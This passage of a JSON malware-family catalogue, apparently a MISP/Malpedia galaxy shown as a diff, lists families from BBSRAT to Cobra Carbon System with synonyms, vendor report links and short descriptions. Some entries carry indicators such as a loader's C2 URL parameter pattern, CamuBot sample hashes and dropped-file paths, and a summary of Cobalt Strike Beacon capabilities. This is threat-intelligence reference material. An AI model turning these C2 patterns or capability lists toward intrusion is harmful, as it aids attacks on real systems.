"https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" - ] - }, - "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", - "value": "BBSRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" - ] - }, - "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", - "value": "Bedep", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", - "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" - ] - }, - "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", - "value": "beendoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", - "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" - ] - }, - "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", - "value": "BernhardPOS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Neurevt" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", - "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", - "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", - "http://www.xylibox.com/2015/04/betabot-retrospective.html", - "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", - "https://www.arbornetworks.com/blog/asert/beta-bot-a-code-review/", - "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", - "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html", - "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39" - ] - }, - "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", - "value": "BetaBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot" - ] - }, - "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", - "value": "BfBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", - "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", - "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf", - "https://habrahabr.ru/post/213973/" - ] - }, - "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", - "value": "BillGates", - "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources." - }, - { - "meta": { - "synonyms": [ - "zxdosml" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", - "value": "Biscuit", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", - "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" - ] - }, - "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", - "value": "Bitsran", - "description": "" - }, - { - "meta": { - "synonyms": [ - "bwin3_bka" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner", - "https://www.evild3ad.com/405/bka-trojaner-ransomware/" - ] - }, - "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", - "value": "BKA Trojaner", - "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", - "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", - "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", - "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/" - ] - }, - "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", - "value": "BlackEnergy", - "description": "" - }, - { - "meta": { - "synonyms": [ - "POSWDS", - "Reedum", - "Kaptoxa" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" - ] - }, - "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c", - "value": "BlackPOS", - "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. " - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution", - "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/" - ] - }, - "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", - "value": "BlackRevolution", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", - "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", - "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/", - "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", - "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" - ] - }, - "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", - "value": "BlackShades", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe", - "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" - ] - }, - "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", - "value": "Boaxxe", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" - ] - }, - "uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b", - "value": "Bohmini", - "description": "" - }, - { - "meta": { - "synonyms": [ - "KBOT" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", - "https://asert.arbornetworks.com/communications-bolek-trojan/", - "http://www.cert.pl/news/11379" - ] - }, - "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", - "value": "Bolek", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", - "value": "Bouncer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", - "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" - ] - }, - "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", - "value": "Bozok", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", - "https://www.us-cert.gov/ncas/alerts/TA18-149A", - "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", - "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" - ] - }, - "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", - "value": "Brambul", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] - }, - "uuid": "fbed27da-551d-4793-ba7e-128256326909", - "value": "BravoNC", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader", - "https://malpedia.caad.fkie.fraunhofer.de" - ] - }, - "uuid": "a05b8e4b-a686-439f-8094-037fbcda52bd", - "value": "Breakthrough", - "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", - "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html", - "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/" - ] - }, - "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", - "value": "Bredolab", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos", - "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html" - ] - }, - "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151", - "value": "BrutPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", - "https://github.com/nccgroup/Royal_APT" - ] - }, - "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", - "value": "BS2005", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware", - "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" - ] - }, - "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", - "value": "BTCWare", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump" - ] - }, - "uuid": "16794655-c0e2-4510-9169-f862df104045", - "value": "Bugat", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Ratopak" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", - "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", - "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", - "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", - "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" - ] - }, - "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", - "value": "Buhtrap", - "description": "" - }, - { - "meta": { - "synonyms": [ - "R2D2", - "0zapftis" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", - "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf", - "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", - "https://www.f-secure.com/weblog/archives/00002249.html", - "https://www.f-secure.com/weblog/archives/00002249.html" - ] - }, - "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", - "value": "Bundestrojaner", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", - "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", - "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/", - "http://malware-traffic-analysis.net/2017/05/09/index.html", - "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/" - ] - }, - "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d", - "value": "Bunitu", - "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72)." - }, - { - "meta": { - "synonyms": [ - "spyvoltar" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat", - "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" - ] - }, - "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", - "value": "Buterat", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus" - ] - }, - "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93", - "value": "Buzus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" - ] - }, - "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1", - "value": "BYEBY", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" - ] - }, - "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", - "value": "c0d0so0", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" - ] - }, - "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", - "value": "CabArt", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Cadelle" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" - ] - }, - "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", - "value": "CadelSpy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot", - "https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/" - ] - }, - "uuid": "ecac83ab-cd64-4def-979a-40aeeca0400b", - "value": "CamuBot", - "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat", - "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" - ] - }, - "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", - "value": "Cannibal Rat", - "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable." - }, - { - "meta": { - "synonyms": [ - "Anunak" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", - "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf", - "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", - "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" - ] - }, - "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", - "value": "Carbanak", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" - ] - }, - "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", - "value": "Carberp", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" - ] - }, - "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", - "value": "Cardinal RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper", - "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" - ] - }, - "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", - "value": "Casper", - "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas", - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - }, - "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", - "value": "Catchamas", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", - "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", - "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", - "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", - "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", - "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", - "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", - "https://blog.avast.com/progress-on-ccleaner-investigation", - "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", - "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", - "https://twitter.com/craiu/status/910148928796061696", - "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", - "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", - "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", - "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" - ] - }, - "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", - "value": "CCleaner Backdoor", - "description": "" - }, - { - "meta": { - "synonyms": [ - "cerebrus" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos", - "https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" - ] - }, - "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", - "value": "CenterPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", - "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", - "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/", - "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html" - ] - }, - "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", - "value": "Cerber", - "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" - ] - }, - "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", - "value": "Cerbu", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Ham Backdoor" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", - "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", - "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html", - "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" - ] - }, - "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", - "value": "ChChes", - "description": "" - }, - { - "meta": { - "synonyms": [ - "cherrypickerpos", - "cherrypicker", - "cherry_picker" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" - ] - }, - "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", - "value": "CherryPicker POS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca", - "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" - ] - }, - "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", - "value": "ChewBacca", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" - ] - }, - "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", - "value": "Chinad", - "description": "Adware that shows advertisements using plugin techniques for popular browsers" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" - ] - }, - "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", - "value": "Chir", - "description": "" - }, - { - "meta": { - "synonyms": [ - "AndroKINS" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", - "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", - "https://www.s21sec.com/en/blog/2017/07/androkins/", - "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/" - ] - }, - "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", - "value": "Chthonic", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", - "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", - "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", - "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", - "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" - ] - }, - "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", - "value": "Citadel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus", - "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" - ] - }, - "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", - "value": "Client Maximus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke", - "https://www.f-secure.com/weblog/archives/00002822.html" - ] - }, - "uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c", - "value": "Cloud Duke", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute", - "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" - ] - }, - "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", - "value": "CMSBrute", - "description": "" - }, - { - "meta": { - "synonyms": [ - "meciv" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", - "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", - "https://twitter.com/ClearskySec/status/963829930776723461", - "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties" - ] - }, - "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e", - "value": "CMSTAR", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", - "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", - "https://www.lac.co.jp/lacwatch/people/20180521_001638.html" - ] - }, - "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", - "value": "Cobalt Strike", - "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", - "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat", - "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html" - ] - }, - "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", - "value": "Cobian RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "COOLPANTS" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", - "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", - "https://www.group-ib.com/blog/renaissance", - "https://asert.arbornetworks.com/double-the-infection-double-the-fun/" - ] - }, - "uuid": "23160942-6de6-41c0-8d8c-44876191c3f0", - "value": "CobInt", - "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager." - }, - { - "meta": { - "synonyms": [ - "Carbon" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", - "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", - "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", - "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", - "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", - "https://github.com/hfiref0x/TDL" - ] - }, - "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", - "value": "Cobra Carbon System", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker", - 